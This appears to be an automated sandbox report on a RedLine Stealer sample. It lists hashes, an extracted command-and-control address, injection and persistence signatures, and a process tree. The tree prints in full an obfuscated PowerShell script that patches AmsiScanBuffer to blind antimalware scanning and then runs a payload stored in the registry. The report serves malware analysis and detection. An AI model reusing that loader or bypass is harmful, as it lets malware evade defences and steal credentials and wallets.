Analysis
- max time kernel: 151s
- max time network: 119s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28/01/2023, 19:05

Static task: static1

Behavioral task: behavioral1
- Sample: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
- Resource: win7-20221111-en

Behavioral task: behavioral2
- Sample: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
- Resource: win10v2004-20220812-en

General
- Target: 1d678410484e34165adb652f7e86a2b5cae5f58d.exe
- Size: 361KB
- MD5: 18852c1659b6641a1f4eeacf6ce6bb8d
- SHA1: 1d678410484e34165adb652f7e86a2b5cae5f58d
- SHA256: 34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
- SHA512: 86295df5931e4673fc6579c1d6425040dbf44c6fbd5c19a35228f1c9f8d4917944c8ff020998d4504853398e7640664bf10c275835b1bfa7a236a073ed518b74
- SSDEEP: 6144:lUNamFD8LPUsNuwibRhinAoCRH+SXm+iMvOfcLpp0AdgqMGjEAOe75wBNEj+nc:lUFD8LPaw2RhinATReSXmPMvBBdqZBNU

Malware Config
Extracted: redline
- 1: 107.182.129.73:21733
- auth_value: 3a5bb0917495b4312d052a0b8977d2bb
Signatures

Modifies security service (2 TTPs, 5 IoCs)

| description | ioc | Process |
|---|---|---|
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe |
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (1 IoCs)

| resource | yara_rule |
|---|---|
| behavioral2/memory/2308-174-0x0000000000620000-0x0000000000640000-memory.dmp | family_redline |
Suspicious use of NtCreateProcessExOtherParentProcess (4 IoCs)

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 4440 created 3344 | 4440 | WerFault.exe | 40 |
| PID 1356 created 3452 | 1356 | WerFault.exe | 38 |
| PID 3736 created 2348 | 3736 | WerFault.exe | 132 |
| PID 5024 created 4328 | 5024 | WerFault.exe | 135 |
Suspicious use of NtCreateUserProcessOtherParentProcess (9 IoCs)

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 3992 created 2824 | 3992 | SmartDefRun.exe | 42 |
| PID 3992 created 2824 | 3992 | SmartDefRun.exe | 42 |
| PID 3992 created 2824 | 3992 | SmartDefRun.exe | 42 |
| PID 3992 created 2824 | 3992 | SmartDefRun.exe | 42 |
| PID 836 created 604 | 836 | powershell.EXE | 3 |
| PID 4444 created 3344 | 4444 | svchost.exe | 40 |
| PID 4444 created 3452 | 4444 | svchost.exe | 38 |
| PID 4444 created 2348 | 4444 | svchost.exe | 132 |
| PID 4444 created 4328 | 4444 | svchost.exe | 135 |
Blocklisted process makes network request (1 IoCs)

| flow | pid | Process |
|---|---|---|
| 20 | 4712 | powershell.exe |

Downloads MZ/PE file

Drops file in Drivers directory (1 IoCs)

| description | ioc | Process |
|---|---|---|
| File created | C:\Windows\System32\drivers\etc\hosts | SmartDefRun.exe |

Executes dropped EXE (5 IoCs)

| pid | Process |
|---|---|
| 3080 | C4Loader.exe |
| 4348 | new2.exe |
| 3896 | SysApp.exe |
| 3992 | SmartDefRun.exe |
| 716 | fodhelper.exe |
Stops running service(s) (3 TTPs)

Uses the VBS compiler for execution (1 TTPs)

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Drops file in System32 directory (8 IoCs)

| description | ioc | Process |
|---|---|---|
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE |
| File opened for modification | C:\Windows\System32\Tasks\Telemetry Logging | svchost.exe |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE |
Suspicious use of SetThreadContext (4 IoCs)

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 3900 set thread context of 5068 | 3900 | 1d678410484e34165adb652f7e86a2b5cae5f58d.exe | 79 |
| PID 4348 set thread context of 2308 | 4348 | new2.exe | 95 |
| PID 3992 set thread context of 1924 | 3992 | SmartDefRun.exe | 119 |
| PID 836 set thread context of 2340 | 836 | powershell.EXE | 124 |

Drops file in Program Files directory (1 IoCs)

| description | ioc | Process |
|---|---|---|
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | SmartDefRun.exe |
Launches sc.exe (5 IoCs)
Sc.exe is a Windows utility to control services on the system.

| pid | Process |
|---|---|
| 492 | sc.exe |
| 3532 | sc.exe |
| 3052 | sc.exe |
| 4648 | sc.exe |
| 4888 | sc.exe |

Program crash (6 IoCs)

| pid | pid_target | Process | procid_target |
|---|---|---|---|
| 4956 | 3900 | WerFault.exe | 77 |
| 2428 | 4348 | WerFault.exe | 91 |
| 3560 | 3344 | WerFault.exe | 40 |
| 2304 | 3452 | WerFault.exe | 38 |
| 100 | 2348 | WerFault.exe | 132 |
| 3572 | 4328 | WerFault.exe | 135 |
Checks processor information in registry (2 TTPs, 12 IoCs)
Processor information is often read in order to detect sandboxing environments.

| description | ioc | Process |
|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe |

Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

| pid | Process |
|---|---|
| 3436 | schtasks.exe |
| 4792 | schtasks.exe |

Enumerates system info in registry (2 TTPs, 8 IoCs)

| description | ioc | Process |
|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe |
Modifies data under HKEY_USERS (64 IoCs)
Suspicious behavior: EnumeratesProcesses (64 IoCs)

| pid | Process |
|---|---|
| 4712 | powershell.exe |
| 4712 | powershell.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 3896 | SysApp.exe |
| 2308 | vbc.exe |
| 3992 | SmartDefRun.exe |
| 3992 | SmartDefRun.exe |
| 4320 | powershell.exe |
| 4320 | powershell.exe |
| 3992 | SmartDefRun.exe |
| 3992 | SmartDefRun.exe |
| 3992 | SmartDefRun.exe |
| 3992 | SmartDefRun.exe |
| 4808 | powershell.exe |
| 4808 | powershell.exe |
| 3992 | SmartDefRun.exe |
| 3992 | SmartDefRun.exe |
| 3244 | powershell.EXE |
| 836 | powershell.EXE |
| 836 | powershell.EXE |
| 3244 | powershell.EXE |
| 836 | powershell.EXE |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 3560 | WerFault.exe |
| 3560 | WerFault.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2304 | WerFault.exe |
| 2304 | WerFault.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
| 2340 | dllhost.exe |
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)

| pid | Process |
|---|---|
| 2824 | Explorer.EXE |

Suspicious use of AdjustPrivilegeToken (64 IoCs)

| description | pid | Process |
|---|---|---|
| Token: SeDebugPrivilege | 4712 | powershell.exe |
| Token: SeDebugPrivilege | 2308 | vbc.exe |
| Token: SeDebugPrivilege | 4320 | powershell.exe |
| Token: SeDebugPrivilege | 4808 | powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 4808 | powershell.exe |
| Token: SeSecurityPrivilege | 4808 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 4808 | powershell.exe |
| Token: SeLoadDriverPrivilege | 4808 | powershell.exe |
| Token: SeSystemProfilePrivilege | 4808 | powershell.exe |
| Token: SeSystemtimePrivilege | 4808 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 4808 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 4808 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 4808 | powershell.exe |
| Token: SeBackupPrivilege | 4808 | powershell.exe |
| Token: SeRestorePrivilege | 4808 | powershell.exe |
| Token: SeShutdownPrivilege | 4808 | powershell.exe |
| Token: SeDebugPrivilege | 4808 | powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 4808 | powershell.exe |
| Token: SeRemoteShutdownPrivilege | 4808 | powershell.exe |
| Token: SeUndockPrivilege | 4808 | powershell.exe |
| Token: SeManageVolumePrivilege | 4808 | powershell.exe |
| Token: 33 | 4808 | powershell.exe |
| Token: 34 | 4808 | powershell.exe |
| Token: 35 | 4808 | powershell.exe |
| Token: 36 | 4808 | powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 4808 | powershell.exe |
| Token: SeSecurityPrivilege | 4808 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 4808 | powershell.exe |
| Token: SeLoadDriverPrivilege | 4808 | powershell.exe |
| Token: SeSystemProfilePrivilege | 4808 | powershell.exe |
| Token: SeSystemtimePrivilege | 4808 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 4808 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 4808 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 4808 | powershell.exe |
| Token: SeBackupPrivilege | 4808 | powershell.exe |
| Token: SeRestorePrivilege | 4808 | powershell.exe |
| Token: SeShutdownPrivilege | 4808 | powershell.exe |
| Token: SeDebugPrivilege | 4808 | powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 4808 | powershell.exe |
| Token: SeRemoteShutdownPrivilege | 4808 | powershell.exe |
| Token: SeUndockPrivilege | 4808 | powershell.exe |
| Token: SeManageVolumePrivilege | 4808 | powershell.exe |
| Token: 33 | 4808 | powershell.exe |
| Token: 34 | 4808 | powershell.exe |
| Token: 35 | 4808 | powershell.exe |
| Token: 36 | 4808 | powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 4808 | powershell.exe |
| Token: SeSecurityPrivilege | 4808 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 4808 | powershell.exe |
| Token: SeLoadDriverPrivilege | 4808 | powershell.exe |
| Token: SeSystemProfilePrivilege | 4808 | powershell.exe |
| Token: SeSystemtimePrivilege | 4808 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 4808 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 4808 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 4808 | powershell.exe |
| Token: SeBackupPrivilege | 4808 | powershell.exe |
| Token: SeRestorePrivilege | 4808 | powershell.exe |
| Token: SeShutdownPrivilege | 4808 | powershell.exe |
| Token: SeDebugPrivilege | 4808 | powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 4808 | powershell.exe |
| Token: SeRemoteShutdownPrivilege | 4808 | powershell.exe |
| Token: SeUndockPrivilege | 4808 | powershell.exe |
| Token: SeManageVolumePrivilege | 4808 | powershell.exe |
| Token: 33 | 4808 | powershell.exe |
Suspicious use of UnmapMainImage (1 IoCs)

| pid | Process |
|---|---|
| 2700 | svchost.exe |

Suspicious use of WriteProcessMemory (64 IoCs)

| description | pid | Process | procid_target |
|---|---|---|---|
| PID 3900 wrote to memory of 5068 | 3900 | 1d678410484e34165adb652f7e86a2b5cae5f58d.exe | 79 |
| PID 3900 wrote to memory of 5068 | 3900 | 1d678410484e34165adb652f7e86a2b5cae5f58d.exe | 79 |
| PID 3900 wrote to memory of 5068 | 3900 | 1d678410484e34165adb652f7e86a2b5cae5f58d.exe | 79 |
| PID 3900 wrote to memory of 5068 | 3900 | 1d678410484e34165adb652f7e86a2b5cae5f58d.exe | 79 |
| PID 3900 wrote to memory of 5068 | 3900 | 1d678410484e34165adb652f7e86a2b5cae5f58d.exe | 79 |
| PID 5068 wrote to memory of 4712 | 5068 | vbc.exe | 83 |
| PID 5068 wrote to memory of 4712 | 5068 | vbc.exe | 83 |
| PID 5068 wrote to memory of 4712 | 5068 | vbc.exe | 83 |
| PID 4712 wrote to memory of 3080 | 4712 | powershell.exe | 90 |
| PID 4712 wrote to memory of 3080 | 4712 | powershell.exe | 90 |
| PID 4712 wrote to memory of 3080 | 4712 | powershell.exe | 90 |
| PID 4712 wrote to memory of 4348 | 4712 | powershell.exe | 91 |
| PID 4712 wrote to memory of 4348 | 4712 | powershell.exe | 91 |
| PID 4712 wrote to memory of 4348 | 4712 | powershell.exe | 91 |
| PID 4712 wrote to memory of 3896 | 4712 | powershell.exe | 93 |
| PID 4712 wrote to memory of 3896 | 4712 | powershell.exe | 93 |
| PID 4712 wrote to memory of 3896 | 4712 | powershell.exe | 93 |
| PID 4712 wrote to memory of 3992 | 4712 | powershell.exe | 94 |
| PID 4712 wrote to memory of 3992 | 4712 | powershell.exe | 94 |
| PID 4348 wrote to memory of 2308 | 4348 | new2.exe | 95 |
| PID 4348 wrote to memory of 2308 | 4348 | new2.exe | 95 |
| PID 4348 wrote to memory of 2308 | 4348 | new2.exe | 95 |
| PID 4348 wrote to memory of 2308 | 4348 | new2.exe | 95 |
| PID 4348 wrote to memory of 2308 | 4348 | new2.exe | 95 |
| PID 4804 wrote to memory of 492 | 4804 | cmd.exe | 109 |
| PID 4804 wrote to memory of 492 | 4804 | cmd.exe | 109 |
| PID 4804 wrote to memory of 3532 | 4804 | cmd.exe | 110 |
| PID 4804 wrote to memory of 3532 | 4804 | cmd.exe | 110 |
| PID 4804 wrote to memory of 3052 | 4804 | cmd.exe | 111 |
| PID 4804 wrote to memory of 3052 | 4804 | cmd.exe | 111 |
| PID 4804 wrote to memory of 4648 | 4804 | cmd.exe | 112 |
| PID 4804 wrote to memory of 4648 | 4804 | cmd.exe | 112 |
| PID 4804 wrote to memory of 4888 | 4804 | cmd.exe | 113 |
| PID 4804 wrote to memory of 4888 | 4804 | cmd.exe | 113 |
| PID 4804 wrote to memory of 3612 | 4804 | cmd.exe | 114 |
| PID 4804 wrote to memory of 3612 | 4804 | cmd.exe | 114 |
| PID 4804 wrote to memory of 4932 | 4804 | cmd.exe | 115 |
| PID 4804 wrote to memory of 4932 | 4804 | cmd.exe | 115 |
| PID 4804 wrote to memory of 4924 | 4804 | cmd.exe | 116 |
| PID 4804 wrote to memory of 4924 | 4804 | cmd.exe | 116 |
| PID 4804 wrote to memory of 4960 | 4804 | cmd.exe | 117 |
| PID 4804 wrote to memory of 4960 | 4804 | cmd.exe | 117 |
| PID 4804 wrote to memory of 2720 | 4804 | cmd.exe | 118 |
| PID 4804 wrote to memory of 2720 | 4804 | cmd.exe | 118 |
| PID 3992 wrote to memory of 1924 | 3992 | SmartDefRun.exe | 119 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 836 wrote to memory of 2340 | 836 | powershell.EXE | 124 |
| PID 2340 wrote to memory of 604 | 2340 | dllhost.exe | 3 |
| PID 2340 wrote to memory of 672 | 2340 | dllhost.exe | 2 |
| PID 2340 wrote to memory of 960 | 2340 | dllhost.exe | 10 |
| PID 2340 wrote to memory of 376 | 2340 | dllhost.exe | 9 |
| PID 2340 wrote to memory of 524 | 2340 | dllhost.exe | 11 |
| PID 2340 wrote to memory of 656 | 2340 | dllhost.exe | 73 |
| PID 2340 wrote to memory of 1032 | 2340 | dllhost.exe | 72 |
| PID 2340 wrote to memory of 1040 | 2340 | dllhost.exe | 16 |
| PID 2340 wrote to memory of 1164 | 2340 | dllhost.exe | 13 |
| PID 2340 wrote to memory of 1180 | 2340 | dllhost.exe | 15 |
Processes

- C:\Windows\system32\lsass.exe
  Command line: C:\Windows\system32\lsass.exe
  PID: 672
- C:\Windows\system32\winlogon.exe
  Command line: winlogon.exe
  PID: 604
  - C:\Windows\system32\dwm.exe
    Command line: "dwm.exe"
    PID: 376
  - C:\Windows\System32\dllhost.exe
    Command line: C:\Windows\System32\dllhost.exe /Processid:{88a03707-cf97-4eaa-8ba3-4076c0137abe}
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    PID: 2340
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
  PID: 960
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
  PID: 524
- C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  Signatures: Drops file in System32 directory
  PID: 1164
  - C:\Windows\system32\taskhostw.exe
    Command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
    PID: 2420
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE with an obfuscated inline script (omitted)
    Signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
    PID: 3244
    - C:\Windows\System32\Conhost.exe
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 308
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lhfTaSYdBzhe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xnIWBRsJAaVnYc,[Parameter(Position=1)][Type]$mwMutZuLsN)$BpOIlHWwJEL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'fl'+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+'M'+[Char](101)+'m'+'o'+''+'r'+''+'y'+''+[Char](77)+'o'+'d'+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+'yD'+'e'+'l'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+'i'+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$BpOIlHWwJEL.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+'e'+'c'+'i'+'alN'+'a'+'me'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xnIWBRsJAaVnYc).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+'m'+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+'ge'+'d'+'');$BpOIlHWwJEL.DefineMethod('I'+'n'+'v'+[Char](111)+''+'k'+'e','P'+[Char](117)+'b'+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+'i'+'de'+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+''+'e'+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+[Char
](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+'a'+'l'+'',$mwMutZuLsN,$xnIWBRsJAaVnYc).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+'nag'+[Char](101)+''+[Char](100)+'');Write-Output $BpOIlHWwJEL.CreateType();}$BbHmNZoVgKBdX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+'32.'+[Char](85)+''+'n'+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](66)+''+[Char](98)+''+'H'+''+[Char](109)+'N'+'Z'+''+[Char](111)+''+[Char](86)+'gKBd'+[Char](88)+'');$lrTXPONRIxKsYf=$BbHmNZoVgKBdX.GetMethod(''+[Char](108)+''+'r'+''+[Char](84)+'XPO'+'N'+''+[Char](82)+''+'I'+'x'+'K'+'s'+[Char](89)+''+[Char](102)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+'at'+'i'+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DMVNhzItWkqBrazkWJe=lhfTaSYdBzhe @([String])([IntPtr]);$dMBCgferDIRMUTOnuNiGNO=lhfTaSYdBzhe 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$nXCTDPmSRNb=$BbHmNZoVgKBdX.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+'a'+'ndl'+[Char](101)+'').Invoke($Null,@([Object]('kern'+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$XikazngSLGrLtK=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$nXCTDPmSRNb,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$ZGvnTpVMXLooDeWjE=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$nXCTDPmSRNb,[Object]('V'+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+'ro'+'t'+''+[Char](101)+'c'+[Char](116)+'')));$QlVkDOb=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XikazngSLGrLtK,$DMVNhzItWkqBrazkWJe).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+[Char](108)+'l');$BojBoLOzWYxilGqYi=$lrTXPONRIxKsYf.Invoke($Null,@([Object]$QlVkDOb,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+'c'+''+[Char](97)+'n'+[Char](66)+'u'+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$SjaBeMAFIM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZGvnTpVMXLooDeWjE,$dMBCgferDIRMUTOnuNiGNO).Invoke($BojBoLOzWYxilGqYi,[uint32]8,4,[ref]$SjaBeMAFIM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BojBoLOzWYxilGqYi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZGvnTpVMXLooDeWjE,$dMBCgferDIRMUTOnuNiGNO).Invoke($BojBoLOzWYxilGqYi,[uint32]8,0x20,[ref]$SjaBeMAFIM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)2⤵
    Signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
    PID:836
    - C:\Windows\System32\Conhost.exe (PID:1852)
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe (PID:716)
    Command line: C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
    Signatures: Executes dropped EXE
    - C:\Windows\SysWOW64\schtasks.exe (PID:4792)
      Command line: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
      Signatures: Creates scheduled task(s)
      - C:\Windows\System32\Conhost.exe (PID:3132)
        Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- C:\Windows\System32\svchost.exe (PID:1216)
  Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  Signatures: Drops file in System32 directory
- C:\Windows\system32\svchost.exe (PID:1180)
